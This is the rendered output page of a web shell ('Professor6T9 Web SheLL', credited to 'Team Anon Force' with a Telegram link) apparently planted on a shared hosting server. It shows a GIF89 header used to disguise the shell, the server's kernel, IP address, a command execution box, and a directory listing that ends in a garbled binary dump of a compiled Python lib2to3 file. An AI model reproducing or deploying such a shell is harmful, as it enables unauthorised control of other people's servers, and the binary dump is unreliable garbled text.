GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
proc
/
thread-self
/
root
/
opt
/
alt
/
python312
/
lib64
/
python3.12
/
lib2to3
/
fixes
/
__pycache__
[ HOME ]
Exec
Submit
fix_reduce.cpython-312.opt-1.pyc
� B[YhE � �J � d Z ddlmZ ddlmZ G d� dej � Zy)zqFixer for reduce(). Makes sure reduce() is imported from the functools module if reduce is used in that module. � )� fixer_base��touch_importc � � e Zd ZdZdZdZd� Zy)� FixReduceT�preai power< 'reduce' trailer< '(' arglist< ( (not(argument<any '=' any>) any ',' not(argument<any '=' any>) any) | (not(argument<any '=' any>) any ',' not(argument<any '=' any>) any ',' not(argument<any '=' any>) any) ) > ')' > > c � � t dd|� y )N� functools�reducer )�self�node�resultss �?/opt/alt/python312/lib64/python3.12/lib2to3/fixes/fix_reduce.py� transformzFixReduce.transform"